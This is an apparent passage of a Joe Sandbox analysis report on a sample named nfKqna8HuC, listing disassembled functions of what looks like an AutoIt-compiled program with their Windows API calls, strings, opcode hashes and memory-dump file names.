Instruction ID: 2456cbd6b3ec0909855d05314734f583082b140587f3947ed994e19fefc0a388
Opcode Fuzzy Hash: 6b59e282a7158498f9a7f87f0072fec7fd17cd64ae0a5b94b314208c726f7631
Instruction Fuzzy Hash: 92F0BE32141201ABD7112BA4EC88EEA376BFF86302B041025F603A59A8CB79AA00DF60

Function 00621CDE Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 250COMMON

Download Yara Rule

APIs

Part of subcall function 0063F4EA: std::exception::exception.LIBCMT ref: 0063F51E
Part of subcall function 0063F4EA: __CxxThrowException@8.LIBCMT ref: 0063F533

__swprintf.LIBCMT ref: 00621EA6

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00621D49

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 2125237772-557222456
Opcode ID: 69828da9ce720ca72cc5f4f4c4f0ab1d71c00f5d9c2b0122c30e732617c75423
Instruction ID: 80e7818247058ad2ac6e7083538ea7eef9ef15b725f87502923bc2037c0e533d
Opcode Fuzzy Hash: 69828da9ce720ca72cc5f4f4c4f0ab1d71c00f5d9c2b0122c30e732617c75423
Instruction Fuzzy Hash: B3919C71108621AFCB64EF24D895CAEB7EABF95710F01491DF8859B2A1DB30ED04CF96

Function 0067AFE0 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 229COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0067B006
CharUpperBuffW.USER32(?,?), ref: 0067B115
VariantClear.OLEAUT32(?), ref: 0067B298

Part of subcall function 00669DC5: VariantInit.OLEAUT32(00000000), ref: 00669E05
Part of subcall function 00669DC5: VariantCopy.OLEAUT32(?,?), ref: 00669E0E
Part of subcall function 00669DC5: VariantClear.OLEAUT32(?), ref: 00669E1A

Strings

Incorrect Parameter format, xrefs: 0067B03E, 0067B20B
AUTOIT.ERROR, xrefs: 0067B11B

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 25b433081be54217ba86c89686ffd10337282e91aebfb7297bd0c4910b5e3d33
Instruction ID: a091105ea34733b471c7ea8288182086e9aa328c6ea32c6fcceab7d4be9aac84
Opcode Fuzzy Hash: 25b433081be54217ba86c89686ffd10337282e91aebfb7297bd0c4910b5e3d33
Instruction Fuzzy Hash: 3E918E706083019FCB50DF24D491AAEB7F6EF89714F04886DF89A9B362DB31E905CB52

Function 00665347 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0063C6F4: _wcscpy.LIBCMT ref: 0063C717

_memset.LIBCMT ref: 00665438
GetMenuItemInfoW.USER32(?), ref: 00665467
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00665513
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0066553D

Strings

0, xrefs: 00665430

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 9b0931c5f5aca05ebdbd595b174e40dce540e44f729ecac99f7ba864c2d428e3
Instruction ID: d26a91ebb1a6ae16686e4cfe9db565726cb875029b4e8462aeba9c7f1c18e2a4
Opcode Fuzzy Hash: 9b0931c5f5aca05ebdbd595b174e40dce540e44f729ecac99f7ba864c2d428e3
Instruction Fuzzy Hash: 1D510371604B019BD7549F28C8866ABB7EBAF86710F04062EF897D7291EB70CD448B92

Function 00660213 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0066027B
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 006602B1
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 006602C2
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00660344

Strings

DllGetClassObject, xrefs: 006602B7

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: bada436ac57bdcd9e5cdaa28f416506b4ce854ebdcf39f9666c126b2d5159e78
Instruction ID: 9ab249ac6c8dee6f3d8564842db9cb66fff1cdecb190209b8c0d1135fa0b935c
Opcode Fuzzy Hash: bada436ac57bdcd9e5cdaa28f416506b4ce854ebdcf39f9666c126b2d5159e78
Instruction Fuzzy Hash: FC414A71600205EFEB15DF54C884B9B7BBAEF45315B1480ADE909AF306D7B1DE44CBA0

Function 00665007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00665075
GetMenuItemInfoW.USER32 ref: 00665091
DeleteMenu.USER32(00000004,00000007,00000000), ref: 006650D7
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,006E1708,00000000), ref: 00665120

Strings

0, xrefs: 0066506D

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 0a00e32ceb9ee45e2e5111aa4f3418b92c00986d7787f4774b02454821384e15
Instruction ID: 109d1e35ed921f494e2f9bc715fad5584e7c76749ea3a701d6ca756b3b5cc8d5
Opcode Fuzzy Hash: 0a00e32ceb9ee45e2e5111aa4f3418b92c00986d7787f4774b02454821384e15
Instruction Fuzzy Hash: 9141C2712047019FD720DF24D886B6AF7E6EF8A324F144A1EF99697391D730E904CB66

Function 00680567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?), ref: 00680587

Strings

winapi, xrefs: 006805F8
stdcall, xrefs: 00680609
none, xrefs: 00680662
cdecl, xrefs: 006805DE

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 2358735015-567219261
Opcode ID: 7e2af4b3c443e2730745aa68ac70626441627b0be754de36831b4254054a3219
Instruction ID: 56999acf69b6933cd74ee26da070eb6e73d919259dc86d84128c7dfa20bf6ca2
Opcode Fuzzy Hash: 7e2af4b3c443e2730745aa68ac70626441627b0be754de36831b4254054a3219
Instruction Fuzzy Hash: 4431BE30900616AFDF40EF54C9419EEB3B6FF55314B008A2EE826A77D1EB71E959CB90

Function 0065B80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 0065B88E
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 0065B8A1
SendMessageW.USER32(?,00000189,?,00000000), ref: 0065B8D1

Strings

ListBox, xrefs: 0065B84D
ComboBox, xrefs: 0065B815

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend
String ID: ComboBox$ListBox
API String ID: 3850602802-1403004172
Opcode ID: 595b3ae54d48a70e949e7d4522aec8180d371d96329c92ea70f03fcdb2c8f6ab
Instruction ID: 3b81461086c5a6ca53b716c5aae6b4ea33aa9c0526584b447561060c0761442c
Opcode Fuzzy Hash: 595b3ae54d48a70e949e7d4522aec8180d371d96329c92ea70f03fcdb2c8f6ab
Instruction Fuzzy Hash: F9212371900108BFDB44AB68D886DFE777EDF16361F10612DF822A72E1DB741D0A8B64

Function 006743E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00674401
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00674427
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00674457
InternetCloseHandle.WININET(00000000), ref: 0067449E

Part of subcall function 00675052: GetLastError.KERNEL32(?,?,006743CC,00000000,00000000,00000001), ref: 00675067

Strings

, xrefs: 00674450

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 1951874230-3916222277
Opcode ID: 83a57f22445db8ed72109152e0a2429ad8cb9afb47a1c69508a539bda4d4f073
Instruction ID: 257e5e72c45e3be8652f5b3086ba097f65c256f5e73d5bf65233a171fd67a7dc
Opcode Fuzzy Hash: 83a57f22445db8ed72109152e0a2429ad8cb9afb47a1c69508a539bda4d4f073
Instruction Fuzzy Hash: 712180B1500208BEE711AF64CC89EFF76EEEB49754F10C01AF10A96240DF759D05A7B0

Function 006890E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 0063D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063D1BA
Part of subcall function 0063D17C: GetStockObject.GDI32(00000011), ref: 0063D1CE
Part of subcall function 0063D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 0068915C
LoadLibraryW.KERNEL32(?), ref: 00689163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00689178
DestroyWindow.USER32(?), ref: 00689180

Strings

SysAnimate32, xrefs: 00689137

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 445c8859ba1b048b38434858bd63ca3da648989d61316e3b0aa58b4500d9e8db
Instruction ID: 72fbaecb83e18360910eedbb59c3fb4a0f245141e42dc79963524831b55ecee9
Opcode Fuzzy Hash: 445c8859ba1b048b38434858bd63ca3da648989d61316e3b0aa58b4500d9e8db
Instruction Fuzzy Hash: 9C21C271204206BBEF106E64DC88EFA37AFEF96364F181318F991A2290C771DC42A770

Function 00669568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00669588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 006695B9
GetStdHandle.KERNEL32(0000000C), ref: 006695CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00669605

Strings

nul, xrefs: 00669600

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a9bb12c21a555aa947f0aef034e7bbb58cb4e52f51fc8d1f685ee9f0e41d9c02
Instruction ID: 99e7cc3404b4275b4d565073c4214282af02aaaafacaa46ee6bb8b5665b825b6
Opcode Fuzzy Hash: a9bb12c21a555aa947f0aef034e7bbb58cb4e52f51fc8d1f685ee9f0e41d9c02
Instruction Fuzzy Hash: 2C215170600205ABDB219F25DC05ADA77EEAF85720F204A19FDA2D73D0D770E945CB30

Function 00669634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00669653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00669683
GetStdHandle.KERNEL32(000000F6), ref: 00669694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 006696CE

Strings

nul, xrefs: 006696C9

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 1581f1df1456957b88ba414ce0b46a8b4ca00ad4cbf7918ce189e7c2a74bd39f
Instruction ID: 6684d62094f6545c8f45f6612ebc43690830fc69b19466f646a74caa3543034c
Opcode Fuzzy Hash: 1581f1df1456957b88ba414ce0b46a8b4ca00ad4cbf7918ce189e7c2a74bd39f
Instruction Fuzzy Hash: 43216D716003059BEB209F6ADC44EDA77EEAF45720F200A19FDA1E73D0EB70A945CB65

Function 0066DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0066DB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0066DB5E
__swprintf.LIBCMT ref: 0066DB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,006BDC00), ref: 0066DBB5

Strings

%lu, xrefs: 0066DB71

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: da67573d89774dc801671f102ed2458964406babf1f5a32248bb59a1cbbeb039
Instruction ID: 2159c9e136166f2d26772cc32fb64647eb914a79b0917414437db33659d4ed57
Opcode Fuzzy Hash: da67573d89774dc801671f102ed2458964406babf1f5a32248bb59a1cbbeb039
Instruction Fuzzy Hash: B2218375A00108AFCB50EF64D985DEEBBBAEF49714B004069F505DB251DB70EA41CF65

Function 0065C9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0065C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0065C84A
Part of subcall function 0065C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0065C85D
Part of subcall function 0065C82D: GetCurrentThreadId.KERNEL32 ref: 0065C864
Part of subcall function 0065C82D: AttachThreadInput.USER32(00000000), ref: 0065C86B

GetFocus.USER32 ref: 0065CA05

Part of subcall function 0065C876: GetParent.USER32(?), ref: 0065C884

GetClassNameW.USER32(?,?,00000100), ref: 0065CA4E
EnumChildWindows.USER32(?,0065CAC4), ref: 0065CA76
__swprintf.LIBCMT ref: 0065CA90

Strings

%s%d, xrefs: 0065CA8A

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: a9318bc356426b188b59e68732b4f0c6b17fd71c03a4e6383949178d9358a4fb
Instruction ID: a1b4103fa706212590df24983d108ae8185ae020c6f3652ae4f7f30a5ef82c4e
Opcode Fuzzy Hash: a9318bc356426b188b59e68732b4f0c6b17fd71c03a4e6383949178d9358a4fb
Instruction Fuzzy Hash: EE11E1B16003097BCF41BFA0DC85FE93B6EAF44725F00806AFE08AA182CB709549CB74

Function 00647A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 00647AD8

Part of subcall function 00647CF4: __mtinitlocknum.LIBCMT ref: 00647D06
Part of subcall function 00647CF4: EnterCriticalSection.KERNEL32(00000000,?,00647ADD,0000000D), ref: 00647D1F

InterlockedIncrement.KERNEL32(?), ref: 00647AE5
__lock.LIBCMT ref: 00647AF9
___addlocaleref.LIBCMT ref: 00647B17

Strings

`j, xrefs: 00647AA3

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: `j
API String ID: 1687444384-3808571552
Opcode ID: 83fc2610b7628ac71339fd2ef52c859d103d7b022798c9b4a6cdf77d5bbceddf
Instruction ID: ba098d806d09e72d992dddd56e1b4ed784dea62705c7dabf32aec509ec8a2f9c
Opcode Fuzzy Hash: 83fc2610b7628ac71339fd2ef52c859d103d7b022798c9b4a6cdf77d5bbceddf
Instruction Fuzzy Hash: 0B016D71404B00DFD760EF75D90574ABBF2EF51321F20890EE49A976A0CBB0A680CB45

Function 0068E32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0068E33D
_memset.LIBCMT ref: 0068E34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,006E3D00,006E3D44), ref: 0068E37B
CloseHandle.KERNEL32 ref: 0068E38D

Strings

D=n, xrefs: 0068E346

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=n
API String ID: 3277943733-1211169007
Opcode ID: c2499469cc380de31830905f49686e6d8486ff13d68762e45091fbf49154a582
Instruction ID: 460ee0e26adf17a6bff0c29ada93da6953ccc851e3ce6cc6e1bbea7ea21398aa
Opcode Fuzzy Hash: c2499469cc380de31830905f49686e6d8486ff13d68762e45091fbf49154a582
Instruction Fuzzy Hash: F9F05EF1540364BAF3102B61AC89F777E5FDF05754F005421BF09DB2A2D7759E108AA8

Function 00681945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 006819F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00681A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00681B49
CloseHandle.KERNEL32(?), ref: 00681BBF

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: f367b668e9bac8bd2345b032b5ebd98e878058b2256a849f403facb74e704bcc
Instruction ID: 88bcd6e4c4e461635c86783798b1ccfdea3a015f527f28bfd98b19d9ec889756
Opcode Fuzzy Hash: f367b668e9bac8bd2345b032b5ebd98e878058b2256a849f403facb74e704bcc
Instruction Fuzzy Hash: F8819070600215ABDF50AF64C896BADBBEAFF09720F148459F905AF382D7B4AD41CF94

Function 0068E062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0068E1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 0068E20D
IsDlgButtonChecked.USER32(?,00000001), ref: 0068E248
GetWindowLongW.USER32(?,000000EC), ref: 0068E269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068E281

Memory Dump Source

Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
